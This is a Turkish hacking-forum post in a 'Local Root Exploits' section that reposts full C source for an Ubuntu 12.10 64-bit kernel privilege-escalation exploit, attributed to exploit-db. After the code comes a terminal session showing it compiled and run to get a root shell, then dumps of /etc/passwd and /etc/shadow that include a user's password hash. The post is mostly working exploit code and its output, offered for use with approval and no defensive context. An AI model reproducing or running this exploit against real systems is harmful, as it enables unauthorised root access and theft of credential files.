1. Duyuruyu Kapat

Ubuntu 12.10 Local Root Exploit

'Local Root Exploits' forumunda r00ts4 tarafından 7 Eylül 2015 tarihinde açılan konu

  1. r00ts4

    r00ts4 Administrator Site Yetkilisi

    Katılım:
    20 Aralık 2014
    Mesaj:
    583
    Beğeniler:
    30
    Ödül Puanları:
    28
    Everybody know Ubuntu is a popular Linux distro(Basically for newbie). Today i was visiting exploitdb and found the Ubuntu 12.10 Local root exploit which worked only on 64bit.

    I have tested the code since i had Ubuntu 12.10 installed on my vm already.

    Code:

    Kod:
    #include <unistd.h>
    #include <sys/socket.h>
    #include <linux/netlink.h>
    #include <netinet/tcp.h>
    #include <errno.h>
    #include <linux/if.h>
    #include <linux/filter.h>
    #include <string.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <linux/sock_diag.h>
    #include <linux/inet_diag.h>
    #include <linux/unix_diag.h>
    #include <sys/mman.h>
    
    typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
    typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
    _commit_creds commit_creds;
    _prepare_kernel_cred prepare_kernel_cred;
    unsigned long sock_diag_handlers, nl_table;
    
    int __attribute__((regparm(3)))
    x()
    {
        commit_creds(prepare_kernel_cred(0));
        return -1;
    }
    
    char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
    
    int main() {
        int fd;
        unsigned long mmap_start, mmap_size = 0x10000;
        unsigned family;
        struct {
            struct nlmsghdr nlh;
            struct unix_diag_req r;
        } req;
        char    buf[8192];
    
        if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
            printf("Can't create sock diag socket\n");
            return -1;
        }
    
        memset(&req, 0, sizeof(req));
        req.nlh.nlmsg_len = sizeof(req);
        req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
        req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
        req.nlh.nlmsg_seq = 123456;
    
        req.r.udiag_states = -1;
        req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
    
        /* Ubuntu 12.10 x86_64 */
        req.r.sdiag_family = 0x37;
        commit_creds = (_commit_creds) 0xffffffff8107d180;
        prepare_kernel_cred = (_prepare_kernel_cred) 0xffffffff8107d410;
        mmap_start = 0x1a000;
    
        if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
            MAP_SHARED|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
    
            printf("mmap fault\n");
            exit(1);
        }
    
        *(unsigned long *)&stage1[sizeof(stage1)-sizeof(&x)] = (unsigned long)x;
        memset((void *)mmap_start, 0x90, mmap_size);
        memcpy((void *)mmap_start+mmap_size-sizeof(stage1), stage1, sizeof(stage1));
    
        send(fd, &req, sizeof(req), 0);
        if(!getuid())
            system("/bin/sh");
    }
    
    Kod:
    [email protected]:~/Documents$ gcc -o ubu *
    [email protected]:~/Documents$ ls
    test.c  ubu
    [email protected]:~/Documents$ ./ubu
    # whoami
    root
    
    # cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    syslog:x:101:103::/home/syslog:/bin/false
    messagebus:x:102:105::/var/run/dbus:/bin/false
    avahi-autoipd:x:103:106:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
    usbmux:x:104:46:usbmux daemon,,,:/home/usbmux:/bin/false
    whoopsie:x:105:110::/nonexistent:/bin/false
    kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
    rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
    colord:x:109:117:colord colour management daemon,,,:/var/lib/colord:/bin/false
    lightdm:x:110:118:Light Display Manager:/var/lib/lightdm:/bin/false
    avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
    hplip:x:112:7:HPLIP system user,,,:/var/run/hplip:/bin/false
    pulse:x:113:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
    saned:x:114:123::/home/saned:/bin/false
    kdm:x:115:65534::/home/kdm:/bin/false
    test:x:1000:1000:test,,,:/home/test:/bin/bash
    Kod:
     # cat /etc/shadow
    
    Kod:
    root:!:15651:0:99999:7:::
    daemon:*:15630:0:99999:7:::
    bin:*:15630:0:99999:7:::
    sys:*:15630:0:99999:7:::
    sync:*:15630:0:99999:7:::
    games:*:15630:0:99999:7:::
    man:*:15630:0:99999:7:::
    lp:*:15630:0:99999:7:::
    mail:*:15630:0:99999:7:::
    news:*:15630:0:99999:7:::
    uucp:*:15630:0:99999:7:::
    proxy:*:15630:0:99999:7:::
    www-data:*:15630:0:99999:7:::
    backup:*:15630:0:99999:7:::
    list:*:15630:0:99999:7:::
    irc:*:15630:0:99999:7:::
    gnats:*:15630:0:99999:7:::
    nobody:*:15630:0:99999:7:::
    libuuid:!:15630:0:99999:7:::
    syslog:*:15630:0:99999:7:::
    messagebus:*:15630:0:99999:7:::
    avahi-autoipd:*:15630:0:99999:7:::
    usbmux:*:15630:0:99999:7:::
    whoopsie:*:15630:0:99999:7:::
    kernoops:*:15630:0:99999:7:::
    rtkit:*:15630:0:99999:7:::
    colord:*:15630:0:99999:7:::
    lightdm:*:15630:0:99999:7:::
    avahi:*:15630:0:99999:7:::
    hplip:*:15630:0:99999:7:::
    pulse:*:15630:0:99999:7:::
    saned:*:15630:0:99999:7:::
    kdm:*:15650:0:99999:7:::
    test:$6$aoMcNoTU$IR6Ug3SthKdI4.ixdwf9rsIRsdz.4OACiabhaoxdd0NoYbjvxa9I.dj7VF7U4OaB7Oy2gDezCXL/oQx9riRXP0:15651:0:99999:7:::
    
    This is really great !

    Source: http://www.exploit-db.com/exploits/24746/
     

Bu Sayfayı Paylaş

Share